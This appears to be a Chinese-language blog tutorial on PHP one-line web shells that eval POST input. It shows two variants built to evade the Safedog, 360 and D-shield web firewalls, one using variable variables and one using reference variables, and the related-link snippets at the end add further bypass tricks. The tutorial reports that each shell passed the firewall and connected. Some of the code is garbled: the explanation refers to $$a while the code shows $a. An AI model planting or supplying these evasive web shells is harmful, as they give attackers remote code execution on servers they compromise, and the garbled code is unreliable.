00x01
安全狗的確是讓人很頭痛,尤其是在上傳一句話或者寫入一句話的時候,會被安全狗攔截從而拿不下shell。
當然,安全狗是最簡單的一款waf,很容易就進行乙個繞過。
00x02
對於繞過安全狗跟360,我姿勢不多,但是卻很實用為以下兩種
1.#可變變數
2.#引用變數
00x03
##可變變數(菜刀可能報錯)
複製**
經常使用的人都知道,只是最簡單的一句話,不過任何waf與規則
我們先來加入需要的函式
<?php
$a='b';
$b=$_post['x'];
@eval($a);
複製**
我們先來測試下是否被殺
可以看見,是成功過了安全狗,我們來測試下連線
並且成功可以連線
**分析#
<?php
$a='b';
$b=$_post['x'];
@eval($a);
?>
複製**
我們來看第二行**
$a='b';
複製**
知道可變變數的人應該都能看懂吧,第三行$$a中的$a是b,也可以這麼說$a替換成b。
繼續看第三行
$b=$_post['x'];
複製**
根據第一行知道$$a就是$b,$b用來接收post 提交的資料
最後第四行
@eval($a);
複製**
執行$$a相當於執行了$a也就是$b. 最後,我們整合成一句話
<?php $a='b'; $b=$_post['x']; @eval($a);?>
複製** 總結
1# 可變變數比較靈活對於過狗也比較簡單
2# 不過d盾只適合安全狗與360針對性比較高
00x04
##引用變數
複製**
還是原始一句話,我先寫出寫好的**
<?php
$a=$_post['x'];
$b=&$a;
@eval($b);
?>
複製**
我們繼續測試下是否被殺,
可以看見,一樣過了安全狗,我們繼續測試下是否可以連線
可以看見,已經連線上了,並且可以進行操作。
##**分析
<?php
$a=$_post['x'];
$b=&$a;
@eval($b);
?>
複製**
我們來看第二行**
$a=$_post['x'];
複製**
$a用來接收post提交的資料
繼續看第三行**
$b=&$a;
複製**
$b引用了$a的記憶體位址間接的相當於$b接收了post提交的資料
最後第四行**:
@eval($b);
複製**
執行$b。最後我們來整合成一句話
<?php $a=$_post['x']; $b=&$a; @eval($b);?>
複製**
總結(與可變變數一樣)
1# 可變變數比較靈活對於過狗也比較簡單
2# 不過d盾只適合安全狗與360針對性比較高
相關鏈結
:
繞過D盾的一句話
乙個很簡單的乙個技巧,作個筆記,可以繞過d盾檢測。新建test1.php eval post g 新建test2.php a post g eval a a 使用d盾 web查殺 v2.0.9 進行查殺,test1.php可以查殺出來,但是test2.php無法查殺。那麼問題就出現在eval a a...
繞過D盾的一句話
乙個很簡單的乙個技巧,作個筆記,可以繞過d盾檢測。新建test1.php eval post g 新建test2.php a post g eval a a 使用d盾 web查殺 v2.0.9 進行查殺,test1.php可以查殺出來,但是test2.php無法查殺。那麼問題就出現在eval a a...
分析某過狗一句話
這個一句話 不記得是 了,作者見諒。最近小菜在學習php,看到這個一句話就分析了下。a range 1,200 在0到200之間產生的隨機數組 b chr a 96 1 1 chr a 114 1 1 chr a 114 1 1 chr a 100 1 1 chr a 113 1 1 chr a 1...